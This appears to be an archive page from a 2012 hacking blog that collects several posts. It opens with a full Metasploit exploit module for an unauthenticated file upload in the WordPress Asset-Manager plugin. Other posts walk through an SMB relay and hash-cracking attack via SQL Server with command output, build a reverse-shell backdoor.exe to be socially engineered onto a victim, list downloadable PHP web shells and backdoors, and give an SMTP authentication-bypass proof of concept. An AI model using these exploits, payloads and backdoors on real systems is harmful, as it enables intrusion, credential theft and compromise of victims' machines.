Home » Archives for 2012
WordPress Asset-Manager PHP File Upload Vulnerability
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/exploit/php_exe'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE
def initialize(info = {})
super(update_info(info,
'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',
'Description' => %q{
This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
plugin. By abusing the upload.php file, a malicious user can upload a file to a
temp directory without authentication, which results in arbitrary code execution.
},
'Author' =>
[
'Sammy FORGIT', # initial discovery
'James Fitts
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '82653' ],
[ 'BID', '53809' ],
[ 'EDB', '18993' ],
[ 'URL',
'http://www.opensyscom.fr/Actualites/wordpress-plugins-asset-manager-shell-upload-vulnerability.html'
]
],
'Payload' =>
{
'BadChars' => "\x00",
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 26 2012'))
register_options(
[
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
], self.class)
end
def exploit
uri = target_uri.path
uri << '/' if uri[-1,1] != '/'
peer = "#{rhost}:#{rport}"
payload_name = "#{rand_text_alpha(5)}.php"
php_payload = get_write_exec_payload(:unlink_self=>true)
data = Rex::MIME::Message.new
data.add_part(php_payload, "application/octet-stream", nil,
"form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
print_status("#{peer} - Uploading payload #{payload_name}")
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
})
if not res or res.code != 200 or res.body !~ /#{payload_name}/
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
end
print_status("#{peer} - Executing payload #{payload_name}")
res = send_request_raw({
'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
'method' => 'GET'
})
if res and res.code != 200
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
end
end
end
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. hackguide4u nor Adnan accepts
//responsibility for any damage caused by the use or misuse of
//this informationBY BOT24

Executing SMB Relay Attacks via SQL Server using Metasploit
In this blog, I’ll provide a brief overview of SMB Relay attacks and
show how they can be initiated through a Microsoft SQL Server. I will
also provide some practical examples that show how to use new Metasploit
modules to gain unauthorized access to SQL Servers during a penetration
test. Below is a summary of what will be covered in this blog:
- A Brief History of SMB Relay
- Using SQL Server to Iniate SMB Authentication Attacks
- Using Metasploit Modules to Capture and Crack Hashes
- Using Metasploit Modules to Relay Authentication
A Brief History of SMB Relay
In summary, an SMB Relay attack can be loosely defined as the process of relaying SMB authentication from one system to another via a man-in-the-middle (MITM) position. Based on my five whole minutes of wiki research I now know that the issues that allow smb attacks to be succesful were identified as a threat in the late 90’s. However, it wasn’t until 2001 that Sir Dystic publicly released a tool that could be used to perform practical attacks. Seven years later Microsoft got around to partially fixing the issue with a patch, but it only prevents attackers from relaying back to the originating system.I guess the good news is that SMB relay attacks can be prevented by enabling and requiring smb message signing, but the bad news is that most environments are configured in such a way that attackers can still relay authentication to other systems.
2001 was a while ago, so I got out my calculator and did some hardcore math to figure out that this has been a well known and practiced attack for at least 11 years. During that time there have been many tools and projects dedicated to taking advantage of the attack technique. Some of the more popular ones include Metasploit, Squirtle, and ZackAttack.
Anyway, let’s get back on track…
Using SQL Server to Initiate SMB Authentication Attacks
So how can we initiate SMB authentication through a SQL Server? As it turns out, SQL Server can interact with the file system in a number of different ways. For example, it supports functions for reading from files, providing directory listings, and checking if files exist. The xp_dirtree and xp_fileexist stored procedures are especially handy, because by default they can be executed by any login with the PUBLIC role in SQL Server 2000 to 2012.How does this help us? Both the xp_dirtree and xp_fileexist stored procedures can support more then just local drives. They also support remote UNC paths (\\server\file). Also, everytime the SQL Server attempts to access a remote file server via a UNC path it automatically attempts to authenticate to it with the SQL Server service account.
The normal authentication process that would occur when a SQL Server accesses a remote file share via a UNC path looks something like the diagram below:
In most enterprise environments the SQL Server service is configured with a domain account. What that means is an attacker could execute one of the prelisted stored procedures via SQL injection (or a valid SQL login) and relay the authentication to another database server to obtain a shell. Alternatively, an attacker could simply capture and crack the hashes offline. However, it should be noted that the SQL Server service can be configured with a number of different accounts. Below is a table showing the basic account configuration options and potential attacks.
Service Account |
Network Communication |
SMB Capture |
SMB Relay |
NetworkService | Computer Account | Yes | No |
Local Administrator | Local Administrator | Yes | Yes |
Domain User | Domain User | Yes | Yes |
Domain Admin | Domain Admin | Yes | Yes |
Using Metasploit Modules to Capture and Crack Hashes
So now that you understand how the basics work, let’s walk through how to initate SMB authentication through SQL server with the intent of gathering and cracking credentials for later use. In the diagram below, I’ve tried to illustrate what it would look like if an attacker initiated a connection from the SQL server to their evil server and captured hashes using a static nonce.The attack scenario above can be automated using the “auxiliary/server/capture/smb” and “auxiliary/admin/mssql/mssql_ntlm_stealer” Metasploit modules. Below is a step by step example of how to capture and crack the credentials using those modules.
Systems for the scenario:
- SQL Server 1: 192.168.1.100
- Attacker System: 192.168.1.102
- Start the Metasploit “smb” capture module to grab password hashes on the attacker’s system:
msfconsole use auxiliary/server/capture/smb set CAINPWFILE /cain_hashes.txt set JOHNPWFILE /john_hashes.txt exploit
- Execute the “mssql_ntlm_stealer” metasploit module to initiate SMB authentication via SQL Server 1 using domain credententials:
msfconsole use auxiliary/admin/mssql/mssql_ntlm_stealer set USE_WINDOWS_AUTHENT true set DOMAIN DEMO set USERNAME test set PASSWORD Password12 set RHOST 192.168.1.100 set RPORT 1433 Set SMBPROXY 192.168.1.102 msf auxiliary(mssql_ntlm_stealer) > run [*] DONT FORGET to run a SMB capture or relay module! [*] Forcing SQL Server at 192.168.1.100 to auth to 192.168.1.102 via xp_dirtree... [*] SMB Captured - 2012-11-26 10:45:35 -0600 NTLMv1 Response Captured from 192.168.1.100:1051 - 192.168.1.100 USER:sqlaccount DOMAIN:LVA OS:Windows Server 2003 3790 Service Pack 2 LM: LMHASH:b0b6932dae11731fc8ddf907024858f89fd700cd9fb72170 NTHASH:c180596a2d116a3c70c329de3a7b097c15fb75cb07822d08 [+] Successfully executed xp_dirtree on 192.168.1.100 [+] Go check your SMB relay or capture module for goodies! [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
- Crack the first 16 characters of the recovered LANMAN hash with
rcracki and a seeded half LM Rainbow Tables. Both can be downloaded from
http://www.project-rainbowcrack.com.
C:\>rcracki_mt -h b0b6932dae11731f ./halflmchall Using 1 threads for pre-calculation and false alarm checking... Found 4 rainbowtable files... halflmchall_alpha-numeric#1-7_0_2400x57648865_1122334455667788_distrrtgen[p][i]_0.rti: reading index... 13528977 bytes read, disk access time: 0.14 s reading table... 461190920 bytes read, disk access time: 4.55 s searching for 1 hash... plaintext of b0b6932dae11731f is WINTER2 cryptanalysis time: 0.96 s statistics ------------------------------------------------------- plaintext found: 1 of 1 (100.00%) total disk access time: 4.68 s total cryptanalysis time: 0.96 s total pre-calculation time: 2.07 s total chain walk step: 2876401 total false alarm: 1215 total chain walk step due to false alarm: 1299561 result ------------------------------------------------------- b0b6932dae11731f WINTER2 hex:57494e54455232
- Crack the second half with john the ripper to obtain the case
insensitive full LM password. Use the netntlm.pl script from the jumbo
pack. They can be downloaded from http://www.openwall.com/john/.
C:\>perl netntlm.pl --seed WINTER2 --file john_hashes.txt …[TRUNCATED]… Loaded 1 password hash (LM C/R DES [netlm]) WINTER2012 (sqlaccount) guesses: 1 time: 0:00:00:10 DONE (Mon Nov 26 10:59:56 2012) c/s: 428962 trying: WINTER204K - WINTER211IA …[TRUNCATED]…
- Run the same command again to obtain the case sensitve password.
C:\>perl netntlm.pl --seed WINTER2 --file john_hashes.txt …[TRUNCATED]… Performing NTLM case-sensitive crack for account: sqlaccount. guesses: 1 time: 0:00:00:00 DONE (Mon Nov 26 11:01:54 2012) c/s: 1454 trying: WINTER2012 - winter2012 Use the "--show" option to display all of the cracked passwords reliably Loaded 1 password hash (NTLMv1 C/R MD4 DES [ESS MD5] [netntlm]) Winter2012 (sqlaccount) …[TRUCATED]…
Using Metasploit Modules to Relay SMB Authentication
Ok, now for the classic relay example. Below is basic diagram showing how an attacker would be able to leverage a shared SQL Server service acccount being used by two SQL servers. All that’s required is a SQL injection or a SQL login that has the PUBLIC role.Now that we have covered the visual, let’s walkthrough the practical attack using the mssql_ntlm_stealer module. This can be used during penetration tests to obtain a meterpreter session on SQL Servers that are using a shared service account.
Systems for the scenario:
- SQL Server 1: 192.168.1.100
- SQL Server 2: 192.168.1.101
- Attacker System: 192.168.1.102
- Start the Metasploit “smb_relay” module to relay authentication to SQL Server 2:
msfconsole use exploit/windows/smb/smb_relay set SMBHOST 192.168.1.101 exploit
- Configure and execute the “mssql_ntlm_stealer” Metasploit module against SQL Server 1:
msfconsole use auxiliary/admin/mssql/mssql_ntlm_stealer set USE_WINDOWS_AUTHENT true set DOMAIN DEMO set USERNAME test set PASSWORD Password12 set RHOST 192.168.1.100 set RPORT 1433 Set SMBPROXY 192.168.1.102 msf auxiliary(mssql_ntlm_stealer) > run [*] DONT FORGET to run a SMB capture or relay module! [*] Forcing SQL Server at 192.168.1.100 to auth to 192.168.1.102 via xp_dirtree... [*] Received 192.168.1.100:1058 LVA\sqlaccount LMHASH:feefee989 c0b45f833b7635f0d2ffd667f4bd0019c952d5a NTHASH:8f3e0be3190fee6b d17b793df4ace8f96e59d324723fcc95 OS:Windows Server 2003 3790 Service Pack 2 LM: [*] Authenticating to 192.168.1.101 as LVA\sqlaccount... [*] AUTHENTICATED as LVA\sqlaccount... [*] Connecting to the ADMIN$ share... [*] Regenerating the payload... [*] Uploading payload... [*] Created \saEQcXca.exe... [*] Connecting to the Service Control Manager... [*] Obtaining a service manager handle... [*] Creating a new service... [*] Closing service handle... [*] Opening service... [*] Starting the service... [*] Removing the service... [*] Sending stage (752128 bytes) to 192.168.1.101 [*] Closing service handle... [*] Deleting \saEQcXca.exe... [*] Sending Access Denied to 192.168.1.100:1058 LVA\sqlaccount [+] Successfully executed xp_dirtree on 192.168.1.100 [+] Go check your SMB relay or capture module for goodies! [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(mssql_ntlm_stealer) > [*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.101:1059) at 2012-11-26 11:54:18 -0600
Wrap Up
I would like to make it clear that none of these are original ideas. Techniques for initiating SMB relay attacks through SQL injection on database platforms like SQL Server have been around a long time. My hope is that the Metasploit modules can be used during penetration tests to help generate more awareness. To those out there trying to do a little good with a little bad – have fun and hack responsibly!BY Scott Sutherland

SQL Fingerprint Xmas Released
Microsoft SQL Server fingerprinting can be a time
consuming process, because it involves trial and error methods to
determine the exact version. Intentionally inserting an invalid input to
obtain a typical error message or using certain alphabets that are
unique for certain server are two of the many ways to possibly determine
the version, but most of them require authentication, permissions
and/or privileges on Microsoft SQL Server to succeed.
Instead, ESF.pl uses a combination of crafted packets for SQL Server Resolution Protocol (SSRP) and Tabular Data Stream Protocol (TDS) (protocols natively used by Microsoft SQL Server) to accurately perform version fingerprinting and determine the exact Microsoft SQL Server version. ESF.pl also applies a sophisticated Scoring Algorithm Mechanism (Powered by Exploit Next Generation++ Technology), which is a much more reliable technique to determine the Microsoft SQL Server version. It is a tool intended to be used by:
This version is a completely rewritten version in Perl, making ESF.pl much more
portable than the previous binary version (Win32), and its original purpose is
to be used as a tool to perform automated penetration test. This version also includes the followingMicrosoft SQL Server versions to its fingerprint
database: • Microsoft SQL Server 2012 SP1 (CU1) • Microsoft SQL Server 2012 SP1 • Microsoft SQL Server 2012 SP1 CTP4 • Microsoft SQL Server 2012 SP1 CTP3 • Microsoft SQL Server 2012 SP0 (CU4) • Microsoft SQL Server 2012 SP0 (MS12-070) • Microsoft SQL Server 2012 SP0 (CU3) • Microsoft SQL Server 2012 SP0 (CU2) • Microsoft SQL Server 2012 SP0 (CU1) • Microsoft SQL Server 2012 SP0 (MS12-070) • Microsoft SQL Server 2012 SP0 (KB2685308) • Microsoft SQL Server 2012 RTM
Download: http://code.google.com
Source: http://code.google.com/p/sql-fingerprint-next-generation

Online Penetration Testing Tools [Private]
Word Press
Remote Code Execution , BruteForce via IP , Theme ScaNne via IP , Theme ScaNne , Site Extracte. Joomla
Turbo Brute Force , Token ScaNe Server, ScaNner Site Extracte,
vBulletin
vB SQL[4.0.x =>4.1.3] , vB Brut Force [Proxy]
Sql
SQL Server ScaNne, SQL Target ScanNer, SQL Dork ScaNne, SQL Injection Helpe,r Admin Finder. LFI
LFI Server ScaNner, LFI ToOl'z Kit, LFI Inject Shell, LFI File Dumper.
Other Tools
Whois Multiple Service, WHMCS LFI Exploit, Multiple CMS ScaNner, Server ScaNn3r CMS,
Server Dork Sc4nN3r, Exploit Finder, Script'z Finder ,Shell Finder ,Users Finder Via IP, Zone-H Poster, Crypte / Decrypte, Decrypte ToOl'z.
To use all This Go to http://www.s3c-l4b.com/
Shell Name
|
Langage Shell
|
Shell Pic
|
Include Txt
|
Download Zip
|
r57 Pro Shell
|
PHP
|
.Txt
|
.Zip
|
|
Sa-H4x0r Shell
|
PHP
|
.Txt
|
.Zip
|
|
WSO Dz Shell
|
PHP
|
.Txt
|
.Zip
|
|
Madspot Shell
|
PHP
|
.Txt
|
||
Uploader
|
PHP
|
.Txt
|
||
SQL_Cmd3 ToOl'z
|
PHP
|
.Zip
|
||
Saudi Shell
|
PHP
|
.Zip
|
||
WebAdmin Shell
|
PHP
|
.Txt
|
.Zip
|
|
Syrian7 Shell
|
PHP
|
.Zip
|
||
PHP Backdoor
|
PHP
|
.Zip
|
||
TurkBlackHat ToOl'z
|
PHP
|
.Txt
|
.Zip
|
|
Security Labs Shell
|
PHP
|
.Txt
|
.Zip
|
|
PHP Smylink
|
PHP
|
.Zip
|
||
WebRoot Multi ToOl'z
|
PHP
|
.Txt
|
.Zip
|
|
SoQor Shell
|
PHP
|
.Txt
|
.Zip
|
|
SymLink Pro
|
Perl
|
---
|
.Zip
|
|
Domain & User & Sym
|
PL-Py-PHP
|
---
|
.Zip
|
|
Python Shelles
|
Py
|
---
|
.Zip
|

Metasploit Nmap Version
For those of you wondering why metasploit uses nmap 5.61 instead of 6.01 when you do
an nmap scan in metasploit its because metasploit has its own nmap built in and the metasploit devs haven't upgraded it yet
if you want to use Nmap 6.01 in metasploit do the following.
Code:
su
mv /opt/metasploit/common/bin/nmap /opt/metasploit/common/bin/nmap.bak
ln -s /usr/local/bin/nmap /opt/metasploit/common/bin/
cd /opt/metasploit/common/lib
cd ../../msf3;./msfconsole
db_nmap -sS -sV -O 192.168.1.0/24 # your gateway maybe different to get your gateway follow below #
Copy and paste below into terminal to get Your Gateway
ip route show default | awk '/default/ {print $3 "/"24}'
if you get a libcrypto system link errror when you start metasploit, nmap or updating do the following
su
cd /opt/metasploit/common/lib
mv libcrypto.so.0.9.8 libcrypto.so.0.9.8-b
mv libssl.so.0.9.8 libssl.so.0.9.8-backup
ln -s /usr/lib/libcrypto.so.0.9.8
ln -s /usr/lib/libssl.so.0.9.8
If you encounter any problems and want to restore the metasploit built in nmap
su
mv /opt/metasploit/common/bin/nmap.bak /opt/metasploit/common/bin/nmap

Metasploit Penetration Testing Cookbook
Download Metasploit Penetration Testing Cookbook
Learn to penetration-test popular operating systems such as Windows7, Windows 2008 Server, Ubuntu etc.
Get familiar with penetration testing based on client side exploitation techniques with detailed analysis of vulnerabilities and codes
Avail of exclusive coverage of antivirus bypassing techniques using metasploit
Master post-exploitation techniques such as exploring the target, keystrokes capturing, sniffing, pivoting, setting persistent connections etc.
Build and export exploits to framework
Use extension tools like Armitage, SET etc.

Real-World Security Tests Using Metasploit
Outside of common Web application tests such as SQL injection and input tampering which are not supported, Metasploit has exploit code for a wide range of vulnerabilities in standalone applications, Web servers, operating systems, and more — 100 exploits and 75 payloads in version 2.4 to be exact. Version 2.5 was just released which, according the Metasploit site, includes bug fixes, cosmetic changes, and 32 more exploits! Even with over 100 exploits to choose from, obviously this isn’t enough to exploit every possible vulnerability in every penetration testing scenario you come across. But then again, the framework was built so you can write your own if you’re so inclined.
In this installment, I’ll outline how to use Metasploit‘s built-in exploits and payloads in a real-world testing scenario. Be forewarned that it’s possible to create undesired results with this tool when performing your tests such as crashing or leaving production systems in an unstable state. As with any ethical hacking venture, proceed with caution and have a contingency plan in the event something goes awry. Please don’t take this lightly.
How to use Metasploit commands
Before jumping into the specific steps to execute this exploit, there are some common msfconsole commands you should know about:
- help (or ‘?’) – shows the available commands in msfconsole
- show exploits – shows the exploits you can run (in our case here, the ms05_039_pnpexploit)
- show payloads – shows the various payload options you can execute on the exploited system such as spawn a command shell, uploading programs to run, etc. (in our case here, the win32_reverse exploit)
- info exploit [exploit name] – shows a description of a specific exploit name along with its various options and requirements (ex. info exploit ms05_039_pnp shows information on that specific attack)
- info payload [payload name] – shows a description of a specific payload name along with its various options and requirements (ex. info payload win32_reverse shows information on spawning a command shell)
- use [exploit name] – instructs msfconsole to enter into a specific exploit’s environment (ex. use ms05_039_pnp will bring up the command prompt ms05_039_pnp > for this specific exploit
- show options – shows the various parameters for the specific exploit you’re working with
- show payloads – shows the payloads compatible with the specific exploit you’re working with
- set PAYLOAD – allows you to set the specific payload for your exploit (in this example,set PAYLOAD win32_reverse)
- show targets – shows the available target OSs and applications that can be exploited
- set TARGET – allows you to select your specific target OS/application (in this example, I’ll use set TARGET 0 to for all English versions of Windows 2000)
- set RHOST – allows you to set your target host’s IP address (in this example, set RHOST 10.0.0.200)
- set LHOST – allows you to set the local host’s IP address for the reverse communications needed to open the reverse command shell (in this example, set LHOST 10.0.0.201)
- back – allows you to exit the current exploit environment you’ve loaded and go back to the main msfconsole prompt
Now that I’ve described the basic commands you’ll need, let’s take a look at some specific steps and screen shots required to carry out a real-world exploit.
My test target in this example is a Windows 2000 Server system that has the MS05-039 plug and play vulnerability (CVE-2005-1983) that was exploited by the Zotob worm. This hole — which Metasploit happens to have an exploit for — allows arbitrary code execution including shell (command prompt) access to the system. I know my target system has this vulnerability because I discovered the problem with the vulnerability assessment tool QualysGuard. This is purely a part of an ethical hacking methodology, but it’s not required. You can blindly test your systems — or, even better — Metasploit can do some of the legwork for you with its “check” function to see if a system is vulnerable before exploiting it. More on this below. My testing system is a Windows XP SP2 system running the Metasploit Framework version 2.4 I downloaded and installed. I’ll use Metasploit’s most commonly used msfconsole interface to demonstrate this attack.
Metasploit how-to: Step 1
I load msfconsole (via Start/Programs/Metasploit Framework/MSFConsole) and its command prompt comes up:
Note: At this point you can enter show exploits to see which exploits are available for your target system.
Metasploit how-to: Step 2
I enter use ms05_039_pnp to run the specific exploit which I know the system is vulnerable, and it loads up that specific exploit’s environment prompt (hence the ms05_039_pnp > prompt):
Metasploit how-to: Step 3
I then enter show payloads to determine which payloads can be sent via this exploit:
Metasploit how-to: Step 4
I decide to have the exploit open up a reverse command shell, so I enter set PAYLOAD win32_reverse. I then enter show targets to determine which operating systems and applications are supported. In this case, I’ll set my target to the option that supports versions of Windows 2000 Service Pack 0 (the first version of Windows 2000) thru Service Pack 4 by entering set TARGET 0:
Metasploit how-to: Step 5
I then enter show options to determine the non-optional exploit and payload parameters that don’t have defaults and, therefore, must be set. In this case, it’s the RHOST and LHOST parameters which can be set via set RHOST 10.0.0.200 and set LHOST 10.0.0.201:
Metasploit how-to: Step 6
I enter show options one final time to make sure everything is set correctly and then entercheck to confirm that my target system is indeed vulnerable to the ms05_039_pnp vulnerability.
Metasploit how-to: Step 7
Finally, I enter exploit to run the exploit and send the payload to my target system — and voila — the connection is established and I have a command prompt on the remote system! Penetration testing at its finest:
You can imagine what could happen at this point if a malicious hacker compromised your system in this way. That’s why it’s so important to “hack” your own systems first so you can find and plug the holes before the bad guys exploit them.
Using Metasploit: There’s more to come
This exploit is just one example of what can be done using Metasploit during penetration testing. The good thing is that outside of the specific exploit and payload I used, most of the commands and techniques in this example can apply directly to other Metasploit-supported exploits.
Once you’re used to how Metasploit operates, you’ll be glad to know that it contains several advanced features. You can save your “set” options, log your actions, and even define how each payload will clean up after itself once it’s done running. The neat thing about Metasploit is that it’s so powerful yet so easy to use. The msfconsole is very intuitive and help is always just a command away.
I encourage you to play around with Metasploit in a test environment to see for yourself what it can do. It’s an enlightening proof of concept tool to say the least. If you stay plugged into the Metasploit Project’s Web site, you can stay abreast of the latest framework and exploit releases. Apparently, a new and improved version of Metasploit (version 3) written in the Ruby programming language is due out soon, so be on the lookout for it as well.
It pleases me that we’ve got such advanced tools like Metasploit at our disposal for the betterment of information security – especially for the low, low price of $0 in this case. These types of exploit tools will certainly play a vital role in the future of improving the overall quality of software, so the more you know about them the better. With a quick Metasploit download, easy install, and a few minutes familiarizing yourself with its interface, the future is all yours.

Owasp Xelenium - XSS Scanner
Xelenium has been designed considering that it should obtain very few inputs from users in the process of discovering the bugs.
Current version helps the user in identifying the Cross Site Scripting (XSS) threats present in the web application. In the subsequent versions, Xelenium will be enhanced such that it could identify the other leading threats.
Download: http://sourceforge.net/projects/xeleniumsecurit/

Download BackTrack 5 R2
BackTrack 5R2 comes in several flavours and architectures.
Download BackTrack 5R2 32bit Gnome
Download BackTrack 5R2 32bit KDE
DownloadBackTrack 5R2 64bit Gnome
Download BackTrack 5R2 64bit KDE

Metasploit Framework Post Exploitation - Windows Security Center
Quick demo as part of post exploitation phase with Metasploit Framework and some tips about the Windows Security Center and the system notifications

DEFT Linux 7 Computer Forensic Live Cd - Released
DEFT (Digital Evidence & Forensic Toolkit) is a customised distribution of the Lubuntu live Linux CD. It is an easy-to-use system that includes excellent hardware detection and some of the best open-source applications dedicated to incident response and computer forensics.
New features:
- Based on Lubuntu 11.10
- Installable Distro
- Linux kernel 3.0.0-12, USB 3 ready
- Libewf 20100226
- Afflib 3.6.14
- TSK 3.2.3
- Autopsy 2.24
- Digital Forensic Framework 1.2
- PTK Forensic 1.0.5 DEFT edition
- Maltego CE
- KeepNote 0.7.6
- Xplico 0.7.1
- Scalpel 2
- Hunchbackeed Foremost 0.6
- Findwild 1.3
- Bulk Extractor 1.1
- Emule Forensic 1.0
- Guymager 0.6.3-1
- Dhash 2
- Cyclone wizard acquire tool
- SQLite Database Browser 2.0b1
- BitPim 1.0.7
- Bbwhatsapp database converter
- Creepy 0.1.9
- Hydra 7.1
- Log2timeline 0.60
- Wine 1.3.28
Download: http://www.mirrordeft.net

Hack Windows 7 with Metasploit
In this tutorial i will exploit a Windows 7 Sp1 OS using Metasploit. i will be using the exploit/multi/handler module which “provides all of the features of the Metasploit payload system to exploits that have been launched outside of the framework“
Before we fire up Metasploit, we need to create a payload in order to gain a meterpreter shell. To create a payload type this in the terminal without the quotes:
msfpayload windows/meterpreter/reverse_tcp LHOST=”your Local IP” LPORT=”listening port” x > /root/backdoor.exe
I used port 4444 (you can choose your own port) for the LPORT which is the listening port and set the LHOST to the IP of the remote attacker which is obviously your Local IP address, my IP is 192.168.10.5.
After that, you should be able to see a file named as backdoor.exe in /root. Send the file to the victim by using your Social Engineering skills and let him click the file. You can change the name of the file so that it is not that obvious.
Launch Metasploit and set the exploit by typing these commands in your msfconsole:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.10.5
set lport 4444
exploit
If all goes well, you should be able to establish a meterpreter session. Type sysinfo to gather some info on the machine. To know other commands for the meterpreter type help. There are also other meterpreter commands like capturing the screenshot of the PC, record keystrokes, capture a snapshot from a webcam, etc. To enter the command shell of the machine, type shell.
it,s cool to take a screenshot with meterpreter command screenshot.
Regards
Adnan Anjum.

MS11-100 DoS PoC exploit published
If you have not patched yet for vulnerability MS11-100 you might want to do it ASAP, because the DoS PoC exploit for this vulnerability has been published three days ago.
More information about the vulnerability and patches at http://technet.microsoft.com/en-us/security/bulletin/ms11-100

Simple Mail Server - SMTP Authentication Bypass Vulnerability
Title: Simple Mail Server - SMTP Authentication Bypass Vulnerability
Software : Simple Mail Server
Software Version : 2011-12-30
Vendor: http://simplemailsvr.sourceforge.net/
Class: Origin Validation Error
CVE:
Remote: Yes
Local: No
Published: 2012-01-08
Updated:
CVSS2 Base: 6.4 (AV:N/AC:L/Au:N/C:P/I:N/A:P)
Impact : Medium (4 < 6.4 < 8)
Bug Description :
Simple Mail Server is a tiny Mail Server written in C#. It can be sent mail without password by using usual tcp
client(such as telnet).
And it did not have SMTP authentication contoller.
POC(Remarks: domain alex.com and user alex () alex com must be exists in configuration for this test case):
telnet 127.0.0.1 25
220 TEST-121F797342 SMTP ready.
EHLO mail_of_alert
500 Not supported. Use HELO
MAIL FROM:
250 OK
RCPT TO:
250 OK
Data
354 Start mail input; end with
From: "alex () alex com"
To: "alex () alex com"
Subject: authenticate is not required!

Perform Smart SSL Cipher Enumeration:SSL Smart
SSLSmart, a highly flexible and interactive tool aimed at improving efficiency and reducing the false positives during SSL testing.
Among other things, SSLSmart simply an advanced and highly flexible Ruby based smart SSL cipher enumeration tool. It is an open source, cross platform, free tool. It was programmed because a number of tools on the Windows platform allow users to test for supported SSL ciphers suites, but most only provide testers with a fixed set of cipher suites. Further testing is performed by initiating an SSL socket connection with one cipher suite at a time, an inefficient approach that leads to false positives and often does not provide a clear picture of the true vulnerability of the server. SSLSmart is designed to combat these shortcomings.
SSLSmart Features:
SSLSmart offers a wide range of features to improve testing efficiency and reduce false positives. These features are as follows:
- Content Scan (default): Exact server response can be seen in HTML and Text forms for each
- cipher suite selected for the test URL. Basically, it shows various server error messages received for weak cipher suites from live systems.
- CONNECT Scan: Focuses only on success or failure of SSL socket connection with various cipher suites. This behavior does not offer any advantage over existing SSL testing tools and is thus likely to have similar issues with false positives. However, this scan is faster and consumes fewer network and CPU resources.
- Dynamic Cipher Suite Support: Most SSL testing tools provide a fixed set of cipher suites. SSLSmart hooks into Ruby OpenSSL bindings and offers dynamic “on the fly” cipher suite generation capabilities.
- Certificate Verification: SSLSmart performs server certificate verification. It uses the Firefox Root CA Certificate4 repository to perform Root CA verification. Additional Root CA Certificates can be added to the rootcerts.pem file or a custom .pem file can be supplied for Root CA Certificate verification.
- Proxy Support: SSLSmart provides web proxy support. For results to be accurate, it is important to use a transparent proxy5.
- Reporting: Reports can be generated in XML, HTML and Text formats along with their verbose versions. Verbose report versions include complete application response for each cipher suite and full details of the server certificate.
- API’s: Monkey patched Ruby API’s that form the backbone of SSLSmart can be consumed to write custom Ruby scripts for quick tests. These API’s can be consumed by users who work with the SSLSmart gem.
What i liked the most about this tool is that SSLSmart supports XML, HTML, Text and their corresponding verbose reporting versions. In addition to details in the normal report, verbose versions include complete application responses for each cipher suite and full details of server certificates. Another feature that i liked is the API support. These API’s form the backbone for SSLSmart tests can be used to write custom scripts. SSLSmart gem includes source code and can be used by users who have Ruby installed on their systems and it comes from McAfee labs!
Platform Support and Installers:
SSLSmart has been tested to work on the following platforms and versions of Ruby:
Windows: Ruby 1.8.6 with wxruby6 (2.0.0) and builder7 (2.1.2).
Linux: Ruby 1.8.7/1.9.1 with wxruby (2.0.0) and builder (2.1.2).
Download SSLSmart:
SSLSmart 1.0 – SSLSmart-Gem-Win-Installer.zip/sslsmart-1.0.gem – http://downloadcenter.mcafee.com/products/tools/foundstone/SSLSmart-Gem-Win-Installer.zip
